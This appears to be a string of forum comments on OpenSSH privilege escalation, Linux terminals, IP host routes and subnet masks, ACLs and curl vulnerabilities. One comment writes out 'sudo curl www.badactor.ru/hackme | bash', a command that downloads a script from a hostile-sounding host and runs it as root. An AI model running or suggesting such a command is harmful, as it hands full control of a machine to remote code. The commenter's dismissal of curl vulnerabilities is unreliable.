Seems novel. But from a security aspect, if OpenSSH has security vulnerability that allows an unauthenticated user to login, via whatever means, once you are in the system as a non-privileged user, you are now free to use the same vulnerability to get root.
Basically this exercise is like using two locks that have the same key to open them. If the same key opens them, then a weakness in one, is now a weakness in the other so why bother with two identical locks?
hahaah. Ok sure you win. Linux TTY's are absolutely not terminals. Sure they are called terminals, they are for all intents and purposes modern-day terminals with a long and storied history that directly links them to terminals from the 70's but since they aren't a physical piece of hardware that electro-mechanically connects to a mainframe, obviously they aren't really terminals and they should be be called something else.
Do you know what a terminal is?
When my calculator app in windows is suspended, but has locked 29 threads and is using 60megs of ram. Not that those two values are significant, but why is my caluclator-app "suspended" when I closed it a few days ago since the last time I used it? Shouldn't it just be closed and not showing up at all.
I'm not a software developer, but I absolutely do coding and one of the standard questions I ask is what OS they run on official company approved laptops. Other then a shitty bank I worked at for a few years (bad idea, but at least I got a pension out of it), all of them allow windows, osx, and at least one flavor of linux. If they don't allow that stuff, you should just turn down the offer anyway.
Layer3 decides where broadcasts stop (at the boundary between two networks, i.e. a router)
Layer2 is where broadcasts go.
This isn't actually correct. An ip address assignment for a host with an IP requires both the address and the subnet mask. One cannot be assigned without the other. Even more strictly speaking the address by itself isn't useful to the network stack except as a destination, and isn't used anywhere in the network stack of the host. There is always a subnet mask, sometimes the mask is assumed to be /32 (255.255.255.255), sometimes /24, whatever. But whenever you are talking about assigning an ip address to any IP speaker, it must include the mask.
The routing table on every IP speaker will include at a minimum a single host-route. That is the IP of the system itself with a /32 mask and the configured interface of that IP. Whether it's eth0, a bonded interface, a loopback etc.
Once you have that single host route, additional routes can be added as needed. These routes require an address, a subnet, and a next-hop. The next hop can be a directly attached interface, or an IP that the is reachable by another route in the host routing table.
If you have only a host route, as OP has, then the system has no network knowledge, so there are no reachable next hop IPs. So you would have to use a directly connected interface, like the OP did. Once you tell the system 192.168.0.0/24 is reachable through that interface, then any IP Packets that have that network as their destination will use that interface with a source of the one IP it has. In the case of two servers connected back to back, assuming the other server knows where the source of the packet came from, there is no problem sending traffic back.
So to answer the OPs question, there is no difference between one host route, then a static route pointing to an interface, and just a directly connected interface with your server IP on it. They are two different routes that may have different administrative distances, but assuming you aren't doing anything exotic, for all intents and purposes they are the same.
If you are talking about layer2 concepts like broadcasts, the host-route configured server can still receive broadcasts, but only broadcasts with destination ip of 255.255.255.255, not scoped broadcasts like 192.168.0.255 since it will ignore all traffic that isn't unscoped broadcast or a full match to it's own IP address.
The only thing you need to know about file acls is not to use them. Similar thing can be said for Network ACLs to be honest.
I'll admit i'm out of my depth about exactly how curl works on the local system, but surely if there is a vulnerability in the "libcurl" library that is much more serious and severe then just saying "curl" is vulnerable.
I'm assuming that libcurl touches a huge amount of the linux network stack.
I don't see how a vulnerability in Curl can exist at all unless it's privilege escalation (you don't run curl as root do you?) And if it's not a privilege escalation, then it sounds like it's just a "root user can do things that you can do as root, possibly unintended" which isn't a vulnerability at all.
sudo curl www.badactor.ru/hackme | bash !!!!
Get two of them and a stack cable and you can have a 96 port switch.
Don't listen to this guy at all.